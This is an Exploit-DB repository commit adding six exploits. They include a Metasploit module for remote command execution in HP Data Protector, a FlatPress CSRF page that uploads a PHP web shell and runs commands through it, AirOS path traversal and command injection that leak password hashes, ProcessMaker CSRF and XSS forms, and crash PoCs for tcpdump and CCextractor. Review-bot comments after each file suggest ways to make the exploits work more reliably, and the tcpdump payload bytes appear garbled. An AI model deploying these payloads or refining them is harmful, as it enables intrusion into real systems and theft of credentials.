DB: 2016-06-01

6 new exploits

FlatPress 1.0.3 - CSRF Arbitrary File Upload
AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities
ProcessMaker 3.0.1.7 - Multiple vulnerabilities
CCextractor 0.80 - Crash PoC
Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)
TCPDump 4.5.1 - Crash PoC
This commit is contained in:
Offensive Security 2016-06-01 05:01:50 +00:00
parent 22d168d0bc
commit 8164665ff7
7 changed files with 561 additions and 0 deletions


@ -36051,3 +36051,9 @@ id,file,description,date,author,platform,type,port
39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0
39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80
39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux x86_64 XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39870,platforms/php/webapps/39870.html,"FlatPress 1.0.3 - CSRF Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0


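--- a/platforms/cgi/webapps/39871.txt
+++ b/platforms/cgi/webapps/39871.txt
@@ -0,0 +1,46 @@
+# AirOS NanoStation M2 v5.6-beta
+# Arbitrary File Download & Remote Command Execution
+# Tested on: XM.v5.6-beta5.24359.141008.1753 - Build: 2435
+# Linux Awesome 2.6.32.63 #1 Wed Oct 8 17:54:30 EEST 2014 mips unknown
+#
+# Date: May 30, 2016
+# Informer: Pablo Rebolini - <rebolini.pablo[x]gmail.com>
+# Valid credentials are required !.
+# Most of devices run default factory user/passwd combination (ubnt:ubnt)
+# Take a look at /usr/www/scr.cgi
+<?
+include("lib/settings.inc");
+include("lib/system.inc");
+$filename = $fname + ".sh";
+$file = $fname + $status;
+header("Content-Type: application/force-download");
+header("Content-Disposition: attachment; filename=" + $filename);
+passthru("cat /tmp/persistent/$file");
+exit;
+# Arbitrary File Download
+# Poc:
+GET http://x.x.x.x/scr.cgi?fname=../../../../../etc/passwd%00&status=
+Raw Response: dWJudDpWdnB2Q3doY2NGdjZROjA6MDpBZG1pbmlzdHJhdG9yOi9ldGMvcGVyc2lzdGVudDovYmluL3NoCm1jdXNlcjohVnZERThDMkVCMTowOjA6Oi9ldGMvcGVyc2lzdGVudC9tY3VzZXI6L2Jpbi9zaAo=
+Base64 Decoded: ubnt:VvpvCwhccFv6Q:0:0:Administrator:/etc/persistent:/bin/sh
+mcuser:!VvDE8C2EB1:0:0::/etc/persistent/mcuser:/bin/sh
+# Remote Command Execution:
+# Poc:
+GET http://x.x.x.x/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status=
+Raw Response: MTI3LjAuMC4xCWxvY2FsaG9zdC5sb2NhbGRvbWFpbglsb2NhbGhvc3QK
+Base64 Decoded: 127.0.0.1 localhost.localdomain localhost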
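Review bot: The scr.cgi excerpt quoted above concatenates with `+` (`$filename = $fname + ".sh";`, `$file = $fname + $status;`), which in PHP is numeric addition rather than string concatenation, so this is presumably a transcription of the original `.` operator; since the whole finding rests on `$file` reaching `passthru("cat /tmp/persistent/$file")` unquoted, the snippet should be quoted verbatim from the device. Both PoCs also rely on the trailing `%00` to truncate the `$status` suffix off the shell command line, and that dependency is worth a sentence because it is what keeps the appended suffix from breaking the `../` traversal and the injected `;cat`. A remediation line would round the advisory off: restrict `fname` to a whitelist or `basename()` and wrap it in `escapeshellarg()`, and rotate the factory `ubnt:ubnt` credentials the header says are required.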

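--- a/platforms/linux/dos/39873.py
+++ b/platforms/linux/dos/39873.py
@@ -0,0 +1,43 @@
+# Exploit Title: CCextractor 0.80 Access Violation Crash
+# Date: 31st May 2016
+# Exploit Author: David Silveiro (Xino.co.uk)
+# Vendor Homepage: http://www.ccextractor.org/
+# Software Link: http://www.ccextractor.org/download-ccextractor.html
+# Version: 0.80
+# Tested on: Ubuntu 14 LTS
+# CVE : 0 day
+from subprocess import call
+from shlex import split
+from time import sleep
+def crash():
+command = './ccextractor crash'
+buffer = '\x00\x00\x00\x04ssixssixs'
+with open('crash', 'w+b') as file:
+file.write(buffer)
+try:
+call(split(command))
+print("Exploit successful! ")
+except:
+print("Error: Something has gone wrong!")
+def main():
+print("Author: David Silveiro ")
+print(" CCextractor 0.80 Access Violation Crash ")
+sleep(2)
+crash()
+if __name__ == "__main__":
+main()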
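Review bot: `call()` does not raise when the child process crashes — it returns a negative status equal to the signal number — so the `try`/`except` around it cannot distinguish a crash from a clean run and "Exploit successful!" is printed either way. Check the return code instead: `rc = call(split(command))`, then `status = "Crashed with signal %d" % -rc if rc < 0 else "No crash (exit %d)" % rc` and `print(status)`. The bare `except:` also hides a missing or non-executable `./ccextractor` (`OSError`) behind the generic message; catching `OSError` explicitly makes that failure visible. Note that `buffer` is a `str` written to a file opened with `w+b`, which only works on Python 2; a `b'...'` literal behaves the same on both interpreters.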

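--- a/platforms/linux/dos/39875.py
+++ b/platforms/linux/dos/39875.py
@@ -0,0 +1,50 @@
+# Exploit Title: tcpdump 4.5.1 Access Violation Crash
+# Date: 31st May 2016
+# Exploit Author: David Silveiro
+# Vendor Homepage: http://www.tcpdump.org
+# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
+# Version: 4.5.1
+# Tested on: Ubuntu 14 LTS
+from subprocess import call
+from shlex import split
+from time import sleep
+def crash():
+command = 'tcpdump -r crash'
+buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
+buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
+buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
+buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
+buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
+buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
+buffer += '\x00\x00\x00\x00\x01\x03\x03\x04'
+with open('crash', 'w+b') as file:
+file.write(buffer)
+try:
+call(split(command))
+print("Exploit successful! ")
+except:
+print("Error: Something has gone wrong!")
+def main():
+print("Author: David Silveiro ")
+print(" tcpdump version 4.5.1 Access Violation Crash ")
+sleep(2)
+crash()
+if __name__ == "__main__":
+main()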
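Review bot: The byte string looks damaged in transcription: the chunk beginning `"xfe$...` is missing the backslash of `\xfe`, and `\x08\n', '\x00` embeds what appears to be the quote-comma separator of a Python list repr, so the file written to disk contains literal `xfe` and `', '` bytes instead of the intended pcap input and the crash may not reproduce at all. The buffer should be regenerated from the original crash file in one piece (for example `repr(open('crash', 'rb').read())`) before anyone relies on it. Independently, `call()` returns rather than raises when tcpdump dies, so "Exploit successful!" prints unconditionally; use `rc = call(split(command))` and treat `rc < 0` as a crash, reporting `-rc` as the signal. Also, `tcpdump -r crash` is resolved through PATH, so the system binary may be exercised instead of the 4.5.1 build named in the title.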

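--- a/platforms/php/webapps/39870.html
+++ b/platforms/php/webapps/39870.html
@@ -0,0 +1,146 @@
+<!DOCTYPE html>
+<!--
+FlatPress 1.0.3 CSRF Arbitrary File Upload
+Vendor: Edoardo Vacchi
+Product web page: http://www.flatpress.org
+Affected version: 1.0.3
+Summary: FlatPress is a blogging engine that saves your posts as
+simple text files. Forget about SQL! You just need some PHP.
+Desc: The vulnerability is caused due to the improper verification
+of uploaded files via the Uploader script using 'upload[]' POST parameter
+which allows of arbitrary files being uploaded in '/fp-content/attachs'
+directory. The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to
+verify the requests. This can be exploited to perform actions with
+administrative privileges if a logged-in user visits a malicious
+web site resulting in execution of arbitrary PHP code by uploading
+a malicious PHP script file and execute system commands.
+Tested on: Apache/2.4.10
+PHP/5.6.3
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2016-5328
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5328.php
+04.04.2016
+-->
+<html>
+<title>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC</title>
+<body>
+<script type="text/javascript">
+function exec(){
+var command = document.getElementById("exec");
+var url = "http://localhost/flatpress/fp-content/attachs/test.php?cmd=";
+var cmdexec = command.value;
+window.open(url+cmdexec,"ZSL_iframe");
+}
+function upload(){
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "http://localhost/flatpress/admin.php?p=uploader&action=default", true);
+xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
+xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary1Ix0O1LgWmzQa0af");
+xhr.withCredentials = true;
+var body = "------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"_wpnonce\"\r\n" +
+"\r\n" +
+"5a462c73ac\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" +
+"\r\n" +
+"/flatpress/admin.php?p=uploader\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"test.php\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\x3c?php\r\n" +
+"system($_REQUEST[\'cmd\']);\r\n" +
+"?\x3e\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload[]\"; filename=\"\"\r\n" +
+"Content-Type: application/octet-stream\r\n" +
+"\r\n" +
+"\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af\r\n" +
+"Content-Disposition: form-data; name=\"upload\"\r\n" +
+"\r\n" +
+"Upload\r\n" +
+"------WebKitFormBoundary1Ix0O1LgWmzQa0af--\r\n";
+var aBody = new Uint8Array(body.length);
+for (var i = 0; i < aBody.length; i++)
+aBody[i] = body.charCodeAt(i);
+xhr.send(new Blob([aBody]));
+}
+</script>
+<h3>FlatPress 1.0.3 CSRF Arbitrary File Upload RCE PoC Script</h3>
+<form action="#">
+<button type="button" onclick=upload()>Upload test.php file!</button>
+</form><br />
+<form action="javascript:exec()">
+<input type="text" id="exec" placeholder="Enter a command">
+<input type="submit" value="Execute!">
+</form><br />
+<iframe
+style="border:2px;border-style:dashed;color:#d3d3d3"
+srcdoc="command output frame"
+width="700" height="600"
+name="ZSL_iframe">
+</iframe>
+<br />
+<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
+</body>
+</html>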
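Review bot: The multipart body hard-codes `_wpnonce` as `5a462c73ac`; if FlatPress binds that token to the admin's session, a page on another origin cannot know it and the forged upload fails, so the PoC should say how the value was obtained, and if the token is not validated at all, that missing check is the CSRF root cause and deserves an explicit sentence in the header comment rather than being left implicit. The cross-origin POST is sent without a preflight only because every header the script sets is CORS-safelisted (`Accept`, `Accept-Language`, and `Content-Type: multipart/form-data`); a comment to that effect would stop a later edit from adding a header that triggers a preflight the target is unlikely to answer. The base `http://localhost/flatpress/` is duplicated in `exec()` and `upload()`; one `var base = "http://localhost/flatpress/";` at the top of the script keeps the two in step when retargeting.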

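--- a/platforms/php/webapps/39872.txt
+++ b/platforms/php/webapps/39872.txt
@@ -0,0 +1,126 @@
+######################################################################
+# Exploit Title: ProcessMaker v3.0.1.7 Multiple vulnerabilities
+# Date: 31/05/2016
+# Author: Mickael Dorigny @ information-security.fr
+# Vendor or Software Link: http://www.processmaker.com/
+# Version: 3.0.1.7
+# Category: Multiple Vulnerabilities
+######################################################################
+ProcessMaker description :
+======================================================================
+ProcessMaker Inc. is the developer of the ProcessMaker Workflow & BPM Software Suite. ProcessMaker automates form based, approval driven workflow that improves the way information flows between data and systems. ProcessMaker has been downloaded more than 750,000 times and is currently being used by thousands of companies around the world. ProcessMaker has a network of more than 35 partners located on 5 different continents.
+Vulnerabilities description :
+======================================================================
+ProcessMaker v3.0.1.7 is vulnerable to multiple vulnerabilities like :
+- Reflected XSS
+- Stored XSS
+- CSRF (x2)
+PoC n°1 - CSRF on Designer Project Creation
+======================================================================
+Designer Project creation process is vulnerable to CSRF vulnerability. a forged request can be used to force an authentified user with designer project creation rights to create a new Designer project.
+PoC:
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
+[POSTDATA]
+PRO_TITLE=AAA&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
+The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
+<form method=POST name=form1 action="http://serversysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject">
+<input type=text name=PRO_TITLE value=XXX>
+<input type=text name=PRO_DESCRIPTION value=XXX>
+<input type=text name=PRO_CATEGORY value="">
+<input type=submit>
+</form>
+<script>
+window.onload = function(){
+document.forms['form1'].submit()
+}
+</script>
+Note that this CSRF vulnerability can be combined with the PoC n°3 that expose a stored XSS vulnerability in the Description input of Designer Project.
+Proof of Concept n°2 - CSRF on group creation
+======================================================================
+Group creation process is vulnerable to CSRF vulnerability, a forged request can be used to force an authentified user with admin rights to create a new group.
+PoC :
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup
+[POSTDATA]
+name=swdcs&status=1
+The following HTML form can be used to exploit this CSRF vulnerability when mixed to phishing technics or auto-submit javascript tricks :
+<form method=POST name=form1 action="http://192.168.1.14/sysworkflow/en/neoclassic/groups/groups_Ajax?action=saveNewGroup">
+<input type=text name=name value=2>
+<input type=text name=status value=1>
+<input type=submit>
+</form>
+<script>
+window.onload = function(){
+document.forms['form1'].submit()
+}
+</script>
+Proof of Concept n°3 - Stored XSS on Designer Project Creation
+======================================================================
+The "description" input of the designer project creation process is vulnerable to stored XSS. A user can use this input to store an XSS an make other user's browsers executes controlled JavaScript instructions.
+PoC
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processProxy/saveProcess?type=bpmnProject
+[POSTDATA]
+PRO_TITLE=AA<img src=x onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEGORY=
+Note that this CSRF vulnerability can be combined with the PoC n°1 that expose a CSRF vulnerability in the Designer Project creation process.
+Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page
+Proof of Concept n°4 - Reflected Cross-Site Scripting (RXSS) with authentication :
+======================================================================
+The search form in the Design Project can redirect user to a blank page without HTML code. This page display some information including user request. We can use this situation to execute JavaScript instruction into browser's user.
+Note that a search request use POST transmission method, to exploit this vulnerability, an attacker need to trap a user to visit a HTML form with auto-submit Javascript tricks to generate the forged request.
+PoC :
+[REQUEST]
+http://server/sysworkflow/en/neoclassic/processes/processesList
+[POSTDATA]
+processName=<img src=x onerror=alert(1);>&start=0&limit=25&category=%3Creset%3E
+Through this vulnerability, an attacker could tamper with page rendering or redirect victim to fake login page.
+Solution:
+======================================================================
+- Update your Process Manager installation to superior version
+Additional resources :
+======================================================================
+- https://www.youtube.com/watch?v=TO2Fu-pbLI8
+- http://www.processmaker.com/
+Report timeline :
+======================================================================
+2016-01-26 : Editor informed for vulnerabilities
+2016-01-27 : Editor response, fixes will be part of the next release
+2016-05-25 : 3.0.1.8 is released with vulnerabilities corrections
+2016-05-31 : Advisory release
+Credits :
+======================================================================
+Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr
+My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/
+--
+SYNETIS
+CONTACT: www.synetis.com | www.information-security.fr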
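Review bot: PoC n°1's form posts to `http://serversysworkflow/...`, dropping the slash after the `server` placeholder that the `[REQUEST]` line just above uses, and PoC n°2's form targets `http://192.168.1.14/` instead of that placeholder; both `action` attributes should read `http://server/sysworkflow/...`. PoC n°3 is described as stored XSS in the "description" input, yet its POSTDATA puts the payload in `PRO_TITLE` while `PRO_DESCRIPTION=BBB` stays benign, and its closing note calls the finding "this CSRF vulnerability" — the prose and the payload field should agree, and the PoC n°1 note that refers to the Description input inherits the same mismatch. The Solution line says only "superior version" while the timeline names the fixed release; `- Update ProcessMaker to 3.0.1.8 or later` is the actionable wording.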

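--- a/platforms/windows/remote/39874.rb
+++ b/platforms/windows/remote/39874.rb
@@ -0,0 +1,144 @@
+# Exploit Title: Data Protector Encrypted Communications
+# Date: 26-05-2016
+# Exploit Author: Ian Lovering
+# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
+# Version: A.09.00 and earlier
+# Tested on: Windows Server 2008
+# CVE : CVE-2016-2004
+#
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'openssl'
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::Powershell
+def initialize(info={})
+super(update_info(info,
+'Name' => "HP Data Protector Encrypted Communication Remote Command Execution",
+'Description' => %q{
+This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
+},
+'License' => MSF_LICENSE,
+'Author' => [ 'Ian Lovering' ],
+'References' =>
+[
+[ 'CVE', '2016-2004' ],
+],
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+],
+'Payload' =>
+{
+'BadChars' => "\x00"
+},
+'DefaultOptions' =>
+{
+'WfsDelay' => 30,
+'RPORT' => 5555
+},
+'Privileged' => false,
+'DisclosureDate' => "Apr 18 2016",
+'DefaultTarget' => 0))
+end
+def check
+# For the check command
+connect
+sock.put(rand_text_alpha_upper(64))
+response = sock.get_once(-1)
+disconnect
+if response.nil?
+return Exploit::CheckCode::Safe
+end
+service_version = Rex::Text.to_ascii(response).chop.chomp
+if service_version =~ /HP Data Protector/
+print_status(service_version)
+return Exploit::CheckCode::Detected
+end
+Exploit::CheckCode::Safe
+end
+def generate_dp_payload
+command = cmd_psh_payload(
+payload.encoded,
+payload_instance.arch.first,
+{ remove_comspec: true, encode_final_payload: true })
+payload =
+"\x32\x00\x01\x01\x01\x01\x01\x01" +
+"\x00\x01\x00\x01\x00\x01\x00\x01" +
+"\x01\x00\x20\x32\x38\x00\x5c\x70" +
+"\x65\x72\x6c\x2e\x65\x78\x65\x00" +
+"\x20\x2d\x65\x73\x79\x73\x74\x65" +
+"\x6d('#{command}')\x00"
+payload_length = [payload.length].pack('N')
+return payload_length + payload
+end
+def exploit
+# Main function
+encryption_init_data =
+"\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
+"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
+"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
+"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
+"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
+print_status("Initiating connection")
+# Open connection
+connect
+# Send init data
+sock.put(encryption_init_data)
+begin
+buf = sock.get_once
+rescue ::EOFError
+end
+print_status("Establishing encrypted channel")
+# Create TLS / SSL context
+sock.extend(Rex::Socket::SslTcp)
+sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
+sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
+sock.sslctx.options = OpenSSL::SSL::OP_ALL
+# Enable TLS / SSL
+sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
+sock.sslsock.connect
+print_status("Sending payload")
+# Send payload
+sock.put(generate_dp_payload(), {timeout: 5})
+# Close socket
+disconnect
+print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
+end
+end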
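Review bot: `check` returns `Exploit::CheckCode::Safe` both when the random 64-byte probe gets no reply and when the reply lacks "HP Data Protector", which tells the operator the host is not vulnerable on evidence that only shows it did not identify itself; `Exploit::CheckCode::Unknown` is the honest result for both branches (`return Exploit::CheckCode::Unknown if response.nil?` and `Exploit::CheckCode::Unknown` as the fall-through), with `Detected` kept for the banner match since no version is parsed. In `generate_dp_payload`, the local `payload = ...` shadows the framework's `payload` accessor that the same method reads two lines earlier via `payload.encoded`; this only works because Ruby treats the name as a method call until the assignment is parsed, so renaming the local to `dp_message` removes the trap. In `exploit`, `buf = sock.get_once` inside the `begin`/`rescue ::EOFError` is never read and can be dropped to a bare `sock.get_once`, and the `Description` text ends with a stray `"` before the closing `}` of the `%q{}` literal.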